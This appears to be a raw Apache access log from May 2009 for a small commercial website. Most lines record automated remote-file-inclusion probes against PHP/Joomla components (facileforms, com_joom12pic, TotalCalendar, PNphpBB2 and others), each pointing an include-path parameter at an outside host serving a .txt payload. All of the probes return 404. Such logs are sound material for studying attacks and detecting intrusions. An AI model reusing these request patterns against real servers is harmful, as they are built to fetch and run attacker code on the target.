88.191.103.144 - - [25/May/2009:01:14:35 -0400] "GET /logs/access_log.Q109051100//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 271 "-" "libwww-perl/5.825"
88.84.128.40 - - [25/May/2009:01:14:41 -0400] "GET /logs/error_log.Q109050400//modules/TotalCalendar/about.php?inc_dir=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 256 "-" "libwww-perl/5.803"
88.84.128.40 - - [25/May/2009:01:14:41 -0400] "GET //modules/TotalCalendar/about.php?inc_dir=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 230 "-" "libwww-perl/5.803"
88.84.128.40 - - [25/May/2009:01:14:41 -0400] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.803"
209.59.12.99 - - [25/May/2009:01:15:16 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
110.45.145.66 - - [25/May/2009:01:16:26 -0400] "GET /logs/access_log.Q109051000//snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.arcoweb.com.br/images/xxx/idxx.txt?? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
221.139.104.104 - - [25/May/2009:01:16:36 -0400] "GET /logs/s_loadenv.inc.php?DOCUMENT_ROOT=http://www.dwno.or.kr/bbs/config/id1.txt?? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
221.139.104.104 - - [25/May/2009:01:16:36 -0400] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://www.dwno.or.kr/bbs/config/id1.txt?? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
80.237.146.58 - - [25/May/2009:01:16:39 -0400] "GET //facileforms.frame.php?ff_compath=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
80.237.146.58 - - [25/May/2009:01:16:39 -0400] "GET /logs//facileforms.frame.php?ff_compath=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
80.237.146.58 - - [25/May/2009:01:16:39 -0400] "GET /logs/access_log.Q109021500//facileforms.frame.php?ff_compath=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
80.237.146.58 - - [25/May/2009:01:16:39 -0400] "GET /logs/access_log.Q108062800//facileforms.frame.php?ff_compath=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
88.84.128.40 - - [25/May/2009:01:16:43 -0400] "GET /logs/error_log.Q109050400//modules/TotalCalendar/about.php?inc_dir=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 256 "-" "libwww-perl/5.803"
88.84.128.40 - - [25/May/2009:01:16:43 -0400] "GET //modules/TotalCalendar/about.php?inc_dir=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 230 "-" "libwww-perl/5.803"
88.84.128.40 - - [25/May/2009:01:16:44 -0400] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.803"
80.237.146.58 - - [25/May/2009:01:16:47 -0400] "GET /logs/access_log.Q109051000//snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
221.139.50.3 - - [25/May/2009:01:17:08 -0400] "GET /logs/access_log.Q109051100%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
89.108.85.158 - - [25/May/2009:01:17:12 -0400] "GET /logs/access_log.Q108062800//facileforms.frame.php?ff_compath=http://indoirc.go.ro/idrou.txt? HTTP/1.1" 404 247 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
89.108.85.158 - - [25/May/2009:01:17:13 -0400] "GET //facileforms.frame.php?ff_compath=http://indoirc.go.ro/idrou.txt? HTTP/1.1" 404 220 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
88.84.128.40 - - [25/May/2009:01:17:17 -0400] "GET /logs/error_log.Q108081200//modules/TotalCalendar/about.php?inc_dir=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 256 "-" "libwww-perl/5.803"
89.108.85.158 - - [25/May/2009:01:17:24 -0400] "GET /logs/access_log.Q109021500//facileforms.frame.php?ff_compath=http://indoirc.go.ro/idrou.txt? HTTP/1.1" 404 247 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
89.108.85.158 - - [25/May/2009:01:17:36 -0400] "GET /logs/access_log.Q108062800//facileforms.frame.php?ff_compath=http://indoirc.go.ro/idrou.txt? HTTP/1.1" 404 247 "-" "libwww-perl/5.803"
89.108.85.158 - - [25/May/2009:01:17:36 -0400] "GET //facileforms.frame.php?ff_compath=http://indoirc.go.ro/idrou.txt? HTTP/1.1" 404 220 "-" "libwww-perl/5.803"
89.108.85.158 - - [25/May/2009:01:17:37 -0400] "GET /logs//facileforms.frame.php?ff_compath=http://indoirc.go.ro/idrou.txt? HTTP/1.1" 404 225 "-" "libwww-perl/5.803"
89.108.85.158 - - [25/May/2009:01:17:48 -0400] "GET /logs/access_log.Q109021500//facileforms.frame.php?ff_compath=http://indoirc.go.ro/idrou.txt? HTTP/1.1" 404 247 "-" "libwww-perl/5.803"
216.104.47.218 - - [25/May/2009:01:17:49 -0400] "GET //facileforms.frame.php?ff_compath=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
216.104.47.218 - - [25/May/2009:01:17:49 -0400] "GET /logs//facileforms.frame.php?ff_compath=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
216.104.47.218 - - [25/May/2009:01:17:49 -0400] "GET /logs/access_log.Q108062800%20%20//facileforms.frame.php?ff_compath=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
216.104.47.218 - - [25/May/2009:01:17:49 -0400] "GET /logs/access_log.Q109021500%20%20//facileforms.frame.php?ff_compath=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
80.237.146.58 - - [25/May/2009:01:18:22 -0400] "GET /logs/error_log.Q108062900%20%20//facileforms.frame.php?ff_compath=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
80.237.146.58 - - [25/May/2009:01:18:22 -0400] "GET /logs/error_log.Q108062400%20%20//facileforms.frame.php?ff_compath=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
216.104.47.218 - - [25/May/2009:01:18:30 -0400] "GET //facileforms.frame.php?ff_compath=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
216.104.47.218 - - [25/May/2009:01:18:30 -0400] "GET /logs//facileforms.frame.php?ff_compath=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
216.104.47.218 - - [25/May/2009:01:18:30 -0400] "GET /logs/access_log.Q108062800%20%20//facileforms.frame.php?ff_compath=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
216.104.47.218 - - [25/May/2009:01:18:32 -0400] "GET /logs/access_log.Q109021500%20%20//facileforms.frame.php?ff_compath=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
89.108.85.158 - - [25/May/2009:01:18:35 -0400] "GET //facileforms.frame.php?ff_compath=http://indoirc.go.ro/idrou.txt? HTTP/1.1" 404 220 "-" "libwww-perl/5.803"
211.234.100.126 - - [25/May/2009:01:18:37 -0400] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.raindrip.com/cms/id.txt???? HTTP/1.1" 404 256 "-" "libwww-perl/5.805"
211.234.100.126 - - [25/May/2009:01:18:37 -0400] "GET /logs/error_log.Q109050800/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.raindrip.com/cms/id.txt???? HTTP/1.1" 404 282 "-" "libwww-perl/5.805"
211.234.100.126 - - [25/May/2009:01:18:37 -0400] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.raindrip.com/cms/id.txt???? HTTP/1.1" 404 261 "-" "libwww-perl/5.805"
89.108.85.158 - - [25/May/2009:01:18:47 -0400] "GET /logs/access_log.Q108062800//facileforms.frame.php?ff_compath=http://www.frenkel.ru/cms/admin/mc.txt??? HTTP/1.1" 404 247 "-" "libwww-perl/5.803"
89.108.85.158 - - [25/May/2009:01:18:48 -0400] "GET //facileforms.frame.php?ff_compath=http://www.frenkel.ru/cms/admin/mc.txt??? HTTP/1.1" 404 220 "-" "libwww-perl/5.803"
89.108.85.158 - - [25/May/2009:01:18:48 -0400] "GET /logs//facileforms.frame.php?ff_compath=http://www.frenkel.ru/cms/admin/mc.txt??? HTTP/1.1" 404 225 "-" "libwww-perl/5.803"
89.108.85.158 - - [25/May/2009:01:18:59 -0400] "GET /logs/access_log.Q109021500//facileforms.frame.php?ff_compath=http://www.frenkel.ru/cms/admin/mc.txt??? HTTP/1.1" 404 247 "-" "libwww-perl/5.803"
212.72.187.132 - - [25/May/2009:01:19:10 -0400] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.omsklyvr.omit.ru/id1.txt??? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
212.72.187.132 - - [25/May/2009:01:19:10 -0400] "GET /logs/access_log.Q108062800/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.omsklyvr.omit.ru/id1.txt??? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
212.72.187.132 - - [25/May/2009:01:19:11 -0400] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.omsklyvr.omit.ru/id1.txt??? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
77.221.130.2 - - [25/May/2009:01:19:13 -0400] "GET /logs/access_log.Q108062800/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://208.98.22.241/id.txt??? HTTP/1.1" 404 283 "-" "libwww-perl/5.805"
77.221.130.2 - - [25/May/2009:01:19:13 -0400] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://208.98.22.241/id.txt??? HTTP/1.1" 404 256 "-" "libwww-perl/5.805"
77.221.130.2 - - [25/May/2009:01:19:13 -0400] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://208.98.22.241/id.txt??? HTTP/1.1" 404 261 "-" "libwww-perl/5.805"
77.221.130.2 - - [25/May/2009:01:19:14 -0400] "GET /logs/access_log.Q108062800/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.raindrip.com/cms/id.txt???? HTTP/1.1" 404 283 "-" "libwww-perl/5.805"
77.221.130.2 - - [25/May/2009:01:19:14 -0400] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.raindrip.com/cms/id.txt???? HTTP/1.1" 404 261 "-" "libwww-perl/5.805"
77.221.130.2 - - [25/May/2009:01:19:14 -0400] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.raindrip.com/cms/id.txt???? HTTP/1.1" 404 256 "-" "libwww-perl/5.805"
77.221.130.2 - - [25/May/2009:01:19:14 -0400] "GET /logs/access_log.Q108052200/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://208.98.22.241/id.txt??? HTTP/1.1" 404 283 "-" "libwww-perl/5.805"
77.221.130.2 - - [25/May/2009:01:19:14 -0400] "GET /logs/access_log.Q108052200/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.raindrip.com/cms/id.txt???? HTTP/1.1" 404 283 "-" "libwww-perl/5.805"
221.139.104.104 - - [25/May/2009:01:19:16 -0400] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.dwno.or.kr/bbs/config/id1.txt?? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
221.139.104.104 - - [25/May/2009:01:19:16 -0400] "GET /logs//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.dwno.or.kr/bbs/config/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
221.139.104.104 - - [25/May/2009:01:19:16 -0400] "GET /logs/access_log.Q109050300//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.dwno.or.kr/bbs/config/id1.txt?? HTTP/1.1" 404 297 "-" "Mozilla/5.0"
221.139.104.104 - - [25/May/2009:01:19:16 -0400] "GET /logs/access_log.Q108091400//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.dwno.or.kr/bbs/config/id1.txt?? HTTP/1.1" 404 297 "-" "Mozilla/5.0"
212.72.187.132 - - [25/May/2009:01:19:17 -0400] "GET /logs/access_log.Q108052200/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.omsklyvr.omit.ru/id1.txt??? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
89.108.85.158 - - [25/May/2009:01:19:53 -0400] "GET /logs/access_log.Q108062800//facileforms.frame.php?ff_compath=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 247 "-" "libwww-perl/5.803"
89.108.85.158 - - [25/May/2009:01:19:53 -0400] "GET //facileforms.frame.php?ff_compath=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 220 "-" "libwww-perl/5.803"
89.108.85.158 - - [25/May/2009:01:19:53 -0400] "GET /logs//facileforms.frame.php?ff_compath=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 225 "-" "libwww-perl/5.803"
212.72.187.132 - - [25/May/2009:01:20:00 -0400] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.omsklyvr.omit.ru/id1.txt??? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
212.72.187.132 - - [25/May/2009:01:20:00 -0400] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.omsklyvr.omit.ru/id1.txt??? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
212.72.187.132 - - [25/May/2009:01:20:00 -0400] "GET /logs/access_log.Q108052200/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.omsklyvr.omit.ru/id1.txt??? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
212.72.187.132 - - [25/May/2009:01:20:07 -0400] "GET /logs/access_log.Q109050700/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.omsklyvr.omit.ru/id1.txt??? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
89.108.85.158 - - [25/May/2009:01:20:07 -0400] "GET /logs/access_log.Q109021500//facileforms.frame.php?ff_compath=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 247 "-" "libwww-perl/5.803"
209.59.12.99 - - [25/May/2009:01:20:16 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
212.72.187.132 - - [25/May/2009:01:20:18 -0400] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.omsklyvr.omit.ru/id1.txt??? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
212.72.187.132 - - [25/May/2009:01:20:18 -0400] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.omsklyvr.omit.ru/id1.txt??? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
72.30.142.171 - - [25/May/2009:01:20:40 -0400] "GET /images/Office%20Supply/ HTTP/1.0" 200 3623 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
88.84.128.40 - - [25/May/2009:01:20:53 -0400] "GET /logs/access_log.Q108110400//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 271 "-" "libwww-perl/5.803"
88.84.128.40 - - [25/May/2009:01:20:53 -0400] "GET //modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 244 "-" "libwww-perl/5.803"
88.84.128.40 - - [25/May/2009:01:20:54 -0400] "GET /logs//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.803"
211.234.100.126 - - [25/May/2009:01:20:58 -0400] "GET /logs/access_log.Q108062800/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.raindrip.com/cms/id.txt???? HTTP/1.1" 404 283 "-" "libwww-perl/5.805"
212.72.187.132 - - [25/May/2009:01:21:08 -0400] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.omsklyvr.omit.ru/id1.txt??? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
212.72.187.132 - - [25/May/2009:01:21:08 -0400] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.omsklyvr.omit.ru/id1.txt??? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
212.72.187.132 - - [25/May/2009:01:21:08 -0400] "GET /logs/access_log.Q108062800/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.omsklyvr.omit.ru/id1.txt??? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
212.72.187.132 - - [25/May/2009:01:21:12 -0400] "GET /logs/access_log.Q108052200/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.omsklyvr.omit.ru/id1.txt??? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
88.84.128.40 - - [25/May/2009:01:21:18 -0400] "GET /logs/error_log.Q109050400//modules/TotalCalendar/about.php?inc_dir=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 256 "-" "libwww-perl/5.803"
88.84.128.40 - - [25/May/2009:01:21:18 -0400] "GET //modules/TotalCalendar/about.php?inc_dir=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 230 "-" "libwww-perl/5.803"
88.84.128.40 - - [25/May/2009:01:21:19 -0400] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.803"
216.104.47.218 - - [25/May/2009:01:21:20 -0400] "GET /logs/access_log.Q108062800//facileforms.frame.php?ff_compath=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
216.104.47.218 - - [25/May/2009:01:21:20 -0400] "GET /logs/access_log.Q109021500//facileforms.frame.php?ff_compath=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
212.72.187.132 - - [25/May/2009:01:21:25 -0400] "GET /logs/dministrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.omsklyvr.omit.ru/id1.txt??? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
212.72.187.132 - - [25/May/2009:01:21:25 -0400] "GET /logs/access_log.Q108062800/dministrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.omsklyvr.omit.ru/id1.txt??? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
212.72.187.132 - - [25/May/2009:01:21:25 -0400] "GET /dministrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.omsklyvr.omit.ru/id1.txt??? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
212.72.187.132 - - [25/May/2009:01:21:31 -0400] "GET /logs/access_log.Q108052200/dministrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.omsklyvr.omit.ru/id1.txt??? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
173.23.171.128 - - [25/May/2009:01:22:06 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/products.html" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
173.23.171.128 - - [25/May/2009:01:22:09 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/products.html" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
173.23.171.128 - - [25/May/2009:01:22:09 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/products.html" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
173.23.171.128 - - [25/May/2009:01:22:09 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/products.html" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
208.52.167.208 - - [25/May/2009:01:22:21 -0400] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.akahairywomen.com/amember/data/safe.txt? HTTP/1.1" 404 274 "-" "libwww-perl/5.805"
88.191.103.144 - - [25/May/2009:01:22:28 -0400] "GET /logs/access_log.Q109013000//modules/TotalCalendar/about.php?inc_dir=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 257 "-" "libwww-perl/5.825"
88.191.103.144 - - [25/May/2009:01:22:28 -0400] "GET //modules/TotalCalendar/about.php?inc_dir=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 230 "-" "libwww-perl/5.825"
88.191.103.144 - - [25/May/2009:01:22:28 -0400] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.825"
123.125.64.49 - - [25/May/2009:01:22:31 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
216.104.47.218 - - [25/May/2009:01:22:43 -0400] "GET /logs/access_log.Q109021500//facileforms.frame.php?ff_compath=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
216.104.47.218 - - [25/May/2009:01:22:48 -0400] "GET /logs/access_log.Q108062800//facileforms.frame.php?ff_compath=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
78.40.224.155 - - [25/May/2009:01:23:00 -0400] "GET /logs/access_log.Q109051800///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://booting-fever.com/booting/fx29id.txt??? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
121.173.130.41 - - [25/May/2009:01:23:03 -0400] "GET /logs/access_log.Q109051100/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
89.108.85.158 - - [25/May/2009:01:23:06 -0400] "GET //facileforms.frame.php?ff_compath=http://www.frenkel.ru/cms/admin/mc.txt??? HTTP/1.1" 404 220 "-" "libwww-perl/5.803"
78.40.224.155 - - [25/May/2009:01:23:14 -0400] "GET /logs/access_log.Q109051800///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://booting-fever.com/booting/fx29id.txt??? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
88.84.128.40 - - [25/May/2009:01:23:35 -0400] "GET /logs/access_log.Q109051100//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 271 "-" "libwww-perl/5.803"
123.125.64.51 - - [25/May/2009:01:23:47 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
121.173.130.41 - - [25/May/2009:01:23:50 -0400] "GET /logs/access_log.Q109050700/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
221.139.104.104 - - [25/May/2009:01:23:50 -0400] "GET /logs/access_log.Q109051800/appserv/main.php?appserv_root=http://www.dwno.or.kr/bbs/config/id1.txt?? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
221.139.104.104 - - [25/May/2009:01:23:50 -0400] "GET /logs/appserv/main.php?appserv_root=http://www.dwno.or.kr/bbs/config/id1.txt?? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
221.139.104.104 - - [25/May/2009:01:23:50 -0400] "GET /appserv/main.php?appserv_root=http://www.dwno.or.kr/bbs/config/id1.txt?? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
88.80.198.13 - - [25/May/2009:01:23:57 -0400] "GET //citywriter/head.php?path=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
88.80.198.13 - - [25/May/2009:01:23:57 -0400] "GET /logs//citywriter/head.php?path=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
88.80.198.13 - - [25/May/2009:01:23:57 -0400] "GET /logs/access_log.Q108091400//citywriter/head.php?path=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
221.139.104.104 - - [25/May/2009:01:23:57 -0400] "GET /logs/access_log.Q108091400%20%20//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.dwno.or.kr/bbs/config/id1.txt?? HTTP/1.1" 404 299 "-" "Mozilla/5.0"
221.139.104.104 - - [25/May/2009:01:24:34 -0400] "GET /logs/access_log.Q109050700/appserv/main.php?appserv_root=http://www.dwno.or.kr/bbs/config/id1.txt?? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
116.50.163.164 - - [25/May/2009:01:24:36 -0400] "GET /logs/access_log.Q109051000/include/functions/function_rex_mquotes.inc.php?REX[INCLUDE_PATH]=http://208.98.22.241/id.txt??? HTTP/1.1" 404 271 "-" "libwww-perl/5.805"
116.50.163.164 - - [25/May/2009:01:24:36 -0400] "GET /logs/include/functions/function_rex_mquotes.inc.php?REX[INCLUDE_PATH]=http://208.98.22.241/id.txt??? HTTP/1.1" 404 249 "-" "libwww-perl/5.805"
116.50.163.164 - - [25/May/2009:01:24:36 -0400] "GET /include/functions/function_rex_mquotes.inc.php?REX[INCLUDE_PATH]=http://208.98.22.241/id.txt??? HTTP/1.1" 404 244 "-" "libwww-perl/5.805"
89.108.85.158 - - [25/May/2009:01:25:03 -0400] "GET //facileforms.frame.php?ff_compath=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 220 "-" "libwww-perl/5.803"
209.59.12.99 - - [25/May/2009:01:25:16 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
221.139.104.104 - - [25/May/2009:01:25:56 -0400] "GET /appserv/main.php?appserv_root=http://www.dwno.or.kr/bbs/config/id1.txt?? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
221.139.104.104 - - [25/May/2009:01:25:56 -0400] "GET /logs/appserv/main.php?appserv_root=http://www.dwno.or.kr/bbs/config/id1.txt?? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
221.139.104.104 - - [25/May/2009:01:25:56 -0400] "GET /logs/access_log.Q109051800/appserv/main.php?appserv_root=http://www.dwno.or.kr/bbs/config/id1.txt?? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
88.80.198.13 - - [25/May/2009:01:26:17 -0400] "GET /logs/access_log.Q108091400%20%20//citywriter/head.php?path=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
221.139.104.104 - - [25/May/2009:01:26:34 -0400] "GET /logs/access_log.Q109050700/appserv/main.php?appserv_root=http://www.dwno.or.kr/bbs/config/id1.txt?? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
88.84.128.40 - - [25/May/2009:01:27:05 -0400] "GET /logs/access_log.Q109013000//modules/TotalCalendar/about.php?inc_dir=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 257 "-" "libwww-perl/5.803"
88.84.128.40 - - [25/May/2009:01:27:05 -0400] "GET //modules/TotalCalendar/about.php?inc_dir=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 230 "-" "libwww-perl/5.803"
88.84.128.40 - - [25/May/2009:01:27:06 -0400] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.803"
